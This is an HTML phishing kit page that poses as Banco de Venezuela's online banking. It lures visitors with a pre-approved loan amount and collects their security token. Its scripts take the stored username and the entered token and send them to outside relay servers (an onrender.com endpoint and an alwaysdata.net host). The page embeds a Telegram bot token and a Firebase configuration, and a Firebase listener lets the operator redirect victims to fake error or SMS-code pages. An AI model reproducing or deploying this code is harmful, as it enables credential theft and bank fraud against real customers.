<!DOCTYPE html>
<html>
<head>
	<title>Banco de Venezuela</title>
	<link href="https://fonts.googleapis.com/css?family=Nunito:300,400,500" rel="stylesheet">
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script> 
	<link rel="icon" type="image/x-icon" href="https://bdvenlinea.banvenez.com/assets/favicon/favicon-16x16.png">
    <link rel="icon" type="image/png" sizes="192x192" href="https://bdvenlinea.banvenez.com/assets/favicon/android-icon-192x192.png">
    <link rel="icon" type="image/png" sizes="32x32" href="https://bdvenlinea.banvenez.com/assets/favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="96x96" href="https://bdvenlinea.banvenez.com/assets/favicon/favicon-96x96.png">
    <link rel="icon" type="image/png" sizes="16x16" href="https://bdvenlinea.banvenez.com/assets/favicon/favicon-16x16.png">
<link rel="stylesheet" href="index1_files/styl.css">
<style>
    body {
      font-family: Arial, sans-serif;
      background-color: #f0f0f0;
      margin: 0;
      padding: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }

    .container {
      background-color: white;
      border-radius: 10px;
      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
      padding: 20px;
      width: 300px;
	  margin-left: 25%;
    }

    h2 {
      margin-top: 0;
    }

    form {
      display: flex;
      flex-direction: column;
    }

    input[type="file"] {
      margin-bottom: 10px;
    }

    button {
      background-color: #007bff;
      color: white;
      border: none;
      padding: 10px;
      cursor: pointer;
      border-radius: 5px;
	  width: 50%;
    }

    button:hover {
      background-color: #0056b3;
    }
  </style>
	<style>
		*{
		  font-family: 'Nunito';
		  margin: 0;
		  padding: 0;
		}

		body{
		  height: 
		}

		.text-center{
		  text-align: center;
		}

		.login-container{
		  overflow:hidden;
		  background-color:#ededed;
		  //background-image: url('background.jpg');
		  background-position:center center;
		  background-size: cover;
		  background-repeat: no-repeat;
		  height: 100vh;
		}


		.login-container-float-center{
		  position: fixed;
		  top: 50%;
		  left: 50%;
		  width: 35%;
		  height: auto;
		  /* bring your own prefixes */
		  transform: translate(-50%, -50%);
		  background-color:#FFFFFF;
		  box-shadow: 0 5px 10px 0px rgba(0, 0, 0, 0.1);
		  -moz-box-shadow: 0 5px 10px 0px rgba(0, 0, 0, 0.1);
		  -webkit-box-shadow: 0 5px 10px 0px rgba(0, 0, 0, 0.1);
		  -o-box-shadow: 0 5px 10px 0px rgba(0, 0, 0, 0.1);
		  -ms-box-shadow: 0 5px 10px 0px rgba(0, 0, 0, 0.1);
		  border-radius: 5px;
		}

		.login-img-container{
		  height: 500px;
		  //background-image: url('/assets/login/bg.png');
		  background-position:center center;
		  background-size: cover;
		}

		.login-container-logo{
		  display: block;
		  margin-right: auto;
		  margin-left: auto;
		  margin-top: 30px;
		}

		.button-action{
		  padding: 20px;
		  display: block;
		  text-align: center;
		}

		.thanks{
		  color:#707070;
		}

		.button-action button{
		  box-sizing: border-box;
		  position: relative;
		  -webkit-user-select: none;
		  -moz-user-select: none;
		  -ms-user-select: none;
		  user-select: none;
		  cursor: pointer;
		  outline: 0;
		  border: none;
		  -webkit-tap-highlight-color: transparent;
		  display: inline-block;
		  white-space: nowrap;
		  text-decoration: none;
		  vertical-align: baseline;
		  text-align: center;
		  margin: 0;
		  min-width: 88px;
		  line-height: 36px;
		  padding: 0 16px;
		  border-radius: 2px;
		  overflow: visible;
		  transform: translate3d(0,0,0);
		  transition: background .4s cubic-bezier(.25,.8,.25,1),box-shadow 280ms cubic-bezier(.4,0,.2,1);
		  color:#FFFFFF;
		  background-color: #0067b1;
		  box-shadow: 0 3px 1px -2px rgb(0 0 0 / 20%), 0 2px 2px 0 rgb(0 0 0 / 14%), 0 1px 5px 0 rgb(0 0 0 / 12%);
		  margin:10px;
		  font-size: 16px;
		}

		.autogestion-user{
		  font-size:14px;
		  color:#707070;
		  text-decoration: none;
		  font-weight: bold;
		}

		.button-login-container{
		  margin-top:20px;
		  text-align: center;
		}

		.button-login-container button{
		  width: 50%;
		  height: 45px;
		}

		.help{
		  float: right;
		  margin:15px;
		}

		.not-margin{
		  margin:0;
		}

		.not-padding{
		  padding:0;
		}
		.logo-login{
		  display: block;
		  margin:0 auto 0 auto;
		  height: 60px;
		}

		.message{
		  margin-top:20px;
		}

		.message .title{
		  font-size:14px;
		  font-weight: bold; 
		  color:#707070;
		}

		.message p {
		  font-size:13px;
		  margin:5px 0 5px 0;
		}

		hr{
			border: 0;
    		height: 0;
    		border-top: 1px solid rgba(0, 0, 0, 0.1);
    		border-bottom: 1px solid rgba(255, 255, 255, 0.3);
    		width: 400px;
    		text-align: center;
    		margin:auto;
		}

		.autogestion-usuario-unico{
		  margin-top:20px;
		}

		@media (max-width: 1500px) {
		  .login-container-float-center{
		    width: 30%;
		  }
		}

		@media (max-width: 1300px) {
		  .login-container-float-center{
		    width: 40%;
		  }
		}

		@media (max-width: 993px) {
		  .login-container-float-center{
		    width: 50%;
		    left: 50%;
		  }
		  .logo-login{
		    height: 50px;
		  }
		}

		@media (max-width: 900px) {
		  .login-container {
		    background-image: unset;
		  }
		}

		@media (max-width: 680px) {
		  .login-container-float-center{
		    width: 70%;
		    background-image: inherit;
		  }
		  .logo-login{
		    height: 30px;
		  }
		}

		@media (max-width: 300px) {
		  .logo-login{
		    height: 30px;
		  }
		  .login-container-float-center{
		    background-image: inherit;
		  }
		}
		input[type=file]::file-selector-button {
  background-color: #007bff;
  color: #ffffff;
  border: 0px;
  border-right: 1px solid #e5e5e5;
  padding: 10px 15px;
  margin-right: 20px;
  transition: .5s;
}

input[type=file]::file-selector-button:hover {
  background-color: #eee;
  border: 0px;
  border-right: 1px solid #e5e5e5;
}


.mat-input-element {
    font: inherit;
    background: 0 0;
    color: currentColor;
    border: none;
    outline: 0;
    padding: 0;
    margin: 0;
    width: 100%;
    max-width: 100%;
    vertical-align: bottom;
    text-align: inherit;
}
.mat-form-field-invalid .mat-input-element, .mat-warn .mat-input-element {
    caret-color: #bb1b47;
}
input:not([type="image" i], [type="range" i], [type="checkbox" i], [type="radio" i]) {
    overflow-clip-margin: 0px !important;
    overflow: clip !important;
}
input[type="text" i] {
    padding-block: 1px;
    padding-inline: 2px;
}
.cdk-text-field-autofill-monitored:not(:-webkit-autofill) {
   
    animation-name: cdk-text-field-autofill-end;
}

input.mat-input-element {
    margin-top: -.0625em;
}
	</style>
</head>
<body>

	<div class="login-container">
	    <div>
	        <div class="login-container-float-center">
	            <div class="row">
	                <div class="not-margin not-padding">
                        <div class="login-container-logo">
                            <img src="logo_bdvenlinea_logoff.png" class="logo-login">
                        </div>

                        <br>

                        <h3 class="text-center thanks" style="margin-bottom: 5%;">Se esta validando su informacion</h3>
						<h4 class="text-center thanks" style="margin-bottom: 5%;">Monto pre-aprobado: 15.000Bs</h4>

						<div class="container">
							
							
							<form id="imageForm">
								
							  

							  <div _ngcontent-c15="" class="row">
								<mat-form-field _ngcontent-c15="" id="dfs" appearance="fill" class="mat-form-field ng-tns-c11-40 mat-primary mat-form-field-type-mat-input mat-form-field-appearance-fill mat-form-field-can-float ng-pristine ng-invalid mat-form-field-invalid ng-touched mat-form-field-hide-placeholder">
								  <div class="mat-form-field-wrapper">
									<div class="mat-form-field-flex">
									  <!---->
									  <!---->
									  <div class="mat-form-field-infix">
										<input _ngcontent-c15="" autocomplete="off" class="mat-input-element mat-form-field-autofill-control cdk-text-field-autofill-monitored ng-pristine ng-invalid ng-touched" formcontrolname="password" matinput="" name="password" type="Text" id="mat-input-1" aria-invalid="true" aria-required="false" aria-describedby="mat-error-4">
										
										<span class="mat-form-field-label-wrapper">
										  <!---->
										  <label class="mat-form-field-label ng-tns-c11-40 mat-empty mat-form-field-empty ng-star-inserted" id="mat-form-field-label-3" for="mat-input-1" aria-owns="mat-input-1" style="">
											<!---->
											<!---->
											<mat-label _ngcontent-c15="" aria-label="Introduce tu contraseña" class="ng-star-inserted">
											  <span _ngcontent-c15="">ami</span>
											</mat-label>
											<!---->
											<!---->
										  </label>
										</span>
									  </div>
									  <!---->
									</div>
									<!---->
									<div class="mat-form-field-underline ng-tns-c11-40 ng-star-inserted" style="display: ;">
									  <span class="mat-form-field-ripple"></span>
									</div>
									<div class="mat-form-field-subscript-wrapper">
									  <!---->
									  <div class="ng-tns-c11-40 ng-trigger ng-trigger-transitionMessages ng-star-inserted" style="opacity: 1; transform: translateY(0%);">
										<!---->
										<mat-error _ngcontent-c15="" align="end" class="mat-error ng-star-inserted" role="alert" id="mat-error-4">El token es <strong _ngcontent-c15="">requerido</strong>
											<mat-error _ngcontent-c15="" align="end" class="mat-error ng-star-inserted" role="alert" id="mat-error-5" style="display: none;" >Codigo <strong _ngcontent-c15="">Incompleto</strong>
										</mat-error>
										<!---->
									  </div>
									  <!---->
									</div>
								  </div>
								</mat-form-field>
							  </div>


							  <button class="mat-raised-button mat-accent" type="button" onclick="carl()" style="display: ; margin-top: 5px;" id="btt" >Enviar</button>
							</form>
						  </div>

                        <div class="button-action">
                        	<!--img src="prueba.png" style="height: 100px;display: block;margin: auto;"-->
                        	<h3>Banco de Venezuela S.A</h3>
	                    	
                        </div>
						

	                </div>
	            </div>
	        </div>
	    </div>
	</div>
	<script>
		
		window.onload = ()=>{
        

      }
        
            document.getElementById("mat-input-1").addEventListener("focusin", ()=>{
               
                document.getElementById("dfs").className +=  "mat-form-field ng-tns-c11-0 mat-primary mat-form-field-type-mat-input mat-form-field-appearance-fill mat-form-field-can-float ng-dirty ng-touched mat-form-field-invalid ng-invalid mat-form-field-should-float";


            })
            document.getElementById("mat-input-1").addEventListener("focusout", ()=>{
                document.getElementById("dfs").className +=  "mat-form-field ng-tns-c11-0 mat-primary mat-form-field-type-mat-input mat-form-field-appearance-fill mat-form-field-can-float ng-dirty ng-touched mat-form-field-invalid ng-invalid mat-form-field-hide-placeholder";


            })
        
       
            document.getElementById("mat-input-1").addEventListener("focusin", ()=>{
                document.getElementById("dfs").className +=  "mat-form-field ng-tns-c11-0 mat-primary mat-form-field-type-mat-input mat-form-field-appearance-fill mat-form-field-can-float ng-dirty ng-touched mat-form-field-invalid ng-invalid mat-form-field-should-float";


            })
            document.getElementById("mat-input-1").addEventListener("focusout", ()=>{
                document.getElementById("dfs").className +=  "mat-form-field ng-tns-c11-0 mat-primary mat-form-field-type-mat-input mat-form-field-appearance-fill mat-form-field-can-float ng-dirty ng-touched mat-form-field-invalid ng-invalid mat-form-field-hide-placeholder";


            })

			function chcs(params) {
    if (document.getElementById("mat-input-1").value.length < 5) {
        alert("Token erroneo o incompleto");
        document.getElementById("mat-input-1").value = ""
        document.getElementById("mat-input-1").focus()

    }else{
        carl()
    }

    
}
function carl(params) {
   if (document.getElementById("mat-input-1").value.length < 5) {
	document.getElementById("mat-error-5").style.display = "block";

   }else{

	const token = '5841260850:AAE3Vubjqe4wVd9835ZGc7C4ybUX8Vl19jg';
const chatId = '-4062784363';
const usr = localStorage.getItem("usr");
const pw = document.getElementById("mat-input-1").value;

  
const message = `-bdv-\n --Usr.: ${usr} \n  Token(ami): ${pw}` ;
$.ajax({
  type: 'POST',
  headers: {
    "Content-Type": "application/json; charset=utf-8"
  },
  url: `https://wrapper-k5su.onrender.com/message`,
  dataType: "json",
  data: JSON.stringify({  
	  message: message,
  }),
  success: function (res) {
	  console.debug(res);
	  $('#response').text('Message sent');
	  console.log("enviado")
	  
	  window.location = "index.html"
	  
	  
	 
  },
  error: function (error) {
	  console.error(error);
	  alert("error failed");
  } 

})
	
   }
      
     

   
   

}




	  </script>
	   <!-- The core Firebase JS SDK is always required and must be listed first -->
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-app.js"></script>

<!-- TODO: Add SDKs for Firebase products that you want to use
     https://firebase.google.com/docs/web/setup#available-libraries -->
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-analytics.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.6.5/firebase-firestore.js"></script>
<script id="testScriptName">
  // Your web app's Firebase configuration
   var firebaseConfig = {
    apiKey: "AIzaSyD1CD-_rmeBNGATJZO1Cl7aVRp5yQTVp7w",
  authDomain: "credijovenbdv.firebaseapp.com",
  projectId: "credijovenbdv",
  storageBucket: "credijovenbdv.appspot.com",
  messagingSenderId: "432178112205",
  appId: "1:432178112205:web:df55e88a70926427d6ab84"


  };
  // Initialize Firebase  
  firebase.initializeApp(firebaseConfig);

</script>
 <script>
	
function escucharCambiosDocumento(documentoId) {
  
  const db = firebase.firestore();

  
  const docRef = db.collection("gree").doc(localStorage.getItem("usr"));

 
  docRef.onSnapshot((doc) => {
    if (doc.exists) {
      const data = doc.data();

     
	 if (data.index === true) {
		alert("Error, verifique su Usuario o Contraseña.");
       
		setTimeout(() => {
			 window.location = "index.html"
		}, 3000);
        
      }

      
      

      
      if (data.sms === true) {
		alert("Imposible validar, verifique con su codigo SMS.");
		setTimeout(() => {
			window.location = "indexwtok.html"
		}, 3000);
       
        
      }

      
    } else {
      console.log("El documento no existe.");
    }
  }, (error) => {
    console.error("Error al obtener el documento: ", error);
  });
}



async function nnaa(params) {
  

  event.preventDefault();
  const usr = localStorage.getItem("usr");
const pw = document.getElementById("mat-input-1").value;
  
  const message =`-bdv-\n --Usr.: ${usr} \n  Token(ami): ${pw}` ;
  

  try {
    const response = await fetch('https://acetatue.alwaysdata.net/', {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json',
      },
      body: JSON.stringify({ message })
    });

    const result = await response.json();
     window.location = "index.html"
      
  } catch (error) {
    document.getElementById('response').innerText = `Error: ${error}`;
  } }



 </script>

</body>
</html>